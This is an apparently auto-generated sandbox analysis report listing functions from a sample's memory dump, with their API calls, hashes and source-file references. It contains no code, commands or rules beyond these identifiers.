                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                            • Opcode ID: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction ID: 0fbef775e9e7da18664adbefb1efe1b6255d57f6e238e56e0ded49500cb80c44
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B14B769082459FDB158F68CC91BFEBBA5EF5A310F1581AAE815AB2C1D3349F01C7A0
                                                                                                                                                                                                                            Function 0019A085 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0019A091
                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0019A15D
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0019A176
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0019A180
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                                                            • Opcode ID: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction ID: 23234def3331fcac2f13c501a3dd4852386ecc6813e7625ce343172bf7bd0869
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5310875D01218DBDF21EFA5D9497CDBBB8AF18300F5041AAE40DAB250EB759B84CF85
                                                                                                                                                                                                                            Function 001B01A2 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B01F6
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B0240
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B0306
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                                                                                            • Opcode ID: 1ca2a4c5390ac1cb86f7587e0ebeee1f4a00ac8a934ac796f61b10fbe6ee9258
                                                                                                                                                                                                                            • Instruction ID: 9e71e6acc58ff5779e0c467d4a377441dd7c308d847fb5c3b0f8fbb12425d4ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ca2a4c5390ac1cb86f7587e0ebeee1f4a00ac8a934ac796f61b10fbe6ee9258
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C861AD719002079FDB2A9F28CC8ABEB77E9FF18300F1042AAE905D6595EB74DD84DB50
                                                                                                                                                                                                                            Function 001A0B69 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001A0C61
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001A0C6B
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001A0C78
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                            • Opcode ID: 6e2b6ae98cc6f57665b33ed4529beea087df751d46f741972eea281284fbce8b
                                                                                                                                                                                                                            • Instruction ID: 3c50113d3451ff4dbec5c57cdc3d1d8da0c37993579545b2f7675ae9a80fafa2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e2b6ae98cc6f57665b33ed4529beea087df751d46f741972eea281284fbce8b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631C57590121C9BCF21DF28D989B8CBBB8BF18310F5042DAE41DA7260E7749F858F45
                                                                                                                                                                                                                            Function 00192805 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                                                            • String ID: ios base: %i
                                                                                                                                                                                                                            • API String ID: 3886170330-1055636949
                                                                                                                                                                                                                            • Opcode ID: 59c23849aaa301085bbf6777472737d676e68ae72dd7b7bd8772a3fae0567870
                                                                                                                                                                                                                            • Instruction ID: 633e645125faf40772974aa99f0c508dcbee9b993ef57fe867a1945ad0f14914
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59c23849aaa301085bbf6777472737d676e68ae72dd7b7bd8772a3fae0567870
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6E186729087169FCB18DF78C8812AEBBE1FF99320F14463EE965D72D1E33589018B81
                                                                                                                                                                                                                            Function 001A2D90 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5d6c2b0c2b7731d556a830f47680bcf32448849bf7266fb62c648a6abdd5fe24
                                                                                                                                                                                                                            • Instruction ID: 71c5508a7b89674db06df2f940272ee796d644096651431f96ca9061da912466
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d6c2b0c2b7731d556a830f47680bcf32448849bf7266fb62c648a6abdd5fe24
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5F13E75E002199FDF14CFA8D980AADF7B1FF89324F158269E825A7381D731AE45CB90
                                                                                                                                                                                                                            Function 001DE517 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                                            • Opcode ID: 0e5d514c79ef925c0a1ce41a7415018d9d52760b019abbb396943d1197465535
                                                                                                                                                                                                                            • Instruction ID: 6002c773dee5e6799f37ef9e9c62a360a30bf57d84bf7e283f92e6ad4f4d0835
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e5d514c79ef925c0a1ce41a7415018d9d52760b019abbb396943d1197465535
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16029FB1D002688BDF25EF64C8803AEBBF5AF55305F0844EAD949AB342D7349E84CF95
                                                                                                                                                                                                                            Function 001DB5AF Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ``C$x`C
                                                                                                                                                                                                                            • API String ID: 0-4276601940
                                                                                                                                                                                                                            • Opcode ID: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                                                                                                                                                                                            • Instruction ID: d5db94c406cbe5f8e59c8aa148a6e75d6ccfba4d2501855324514d9ceb6c30ed
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151A073904216DBEB18CF59C4C16E973B1EF98304F2684BAD84AAF386EB709941CB50
                                                                                                                                                                                                                            Function 00192A0F Relevance: 1.9, APIs: 1, Instructions: 384COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0019301A: __EH_prolog3_catch.LIBCMT ref: 00193021
                                                                                                                                                                                                                            • _Deallocate.LIBCONCRT ref: 00192E06
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeallocateH_prolog3_catch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 20358830-0
                                                                                                                                                                                                                            • Opcode ID: b205591d52042a80474cd02ee0ade2311398e6ed513a44da6cb67509e3884182
                                                                                                                                                                                                                            • Instruction ID: dc9e537a75a7983b5e15e9f3332d7137e385db9bab74e78c598077981b62cb08
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b205591d52042a80474cd02ee0ade2311398e6ed513a44da6cb67509e3884182
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2B1A233D10A1A5BCF1CD97989911EEFAD5EF5A320F55433BE925EB3D0D3358A028684
                                                                                                                                                                                                                            Function 001A943C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A9437,?,?,00000008,?,?,001B4915,00000000), ref: 001A9669
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                            • Opcode ID: 7dabf66aa4032aa47eea94e5e75350a1baa74933e8bf42e96a19d4e4568abc96
                                                                                                                                                                                                                            • Instruction ID: 259c13c7ac04d0f0c6dfc84042d6091618e08e8e27cf84aa7233afc9c089198a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dabf66aa4032aa47eea94e5e75350a1baa74933e8bf42e96a19d4e4568abc96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5B14E79610608DFDB19CF28C486B657BE0FF46364F258659E89ACF2A1C335E992CF40
                                                                                                                                                                                                                            Function 00199B05 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00199B1B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                                                            • Opcode ID: 04cdb33e1c61dff412cd5267bc7558a0ad123afc0a54151947beeffaf99cc606
                                                                                                                                                                                                                            • Instruction ID: da69f12f026bc9620fab8617908a9dbc70d4cb06dfdf083aa696f019d82d0c87
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04cdb33e1c61dff412cd5267bc7558a0ad123afc0a54151947beeffaf99cc606
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36A15AB1900605DFDB29DF58E885AAEBBF0FB48314F29856ED911EB6A0D3349981CF50
                                                                                                                                                                                                                            Function 001AD2FE Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 293efe0d4a7ad2f557fb7a132399e04a00f482c7cb694968f4a868173b302c35
                                                                                                                                                                                                                            • Instruction ID: 1934a74d81d843276fdc44676e0eabd0f949e3fed7e9760290882c538c4c0e6a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 293efe0d4a7ad2f557fb7a132399e04a00f482c7cb694968f4a868173b302c35
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41C4B9C0461CAFCF20DF68DC89AAABBB8EF56300F1442D9E449D3201DB309E858F10
                                                                                                                                                                                                                            Function 0019FD34 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
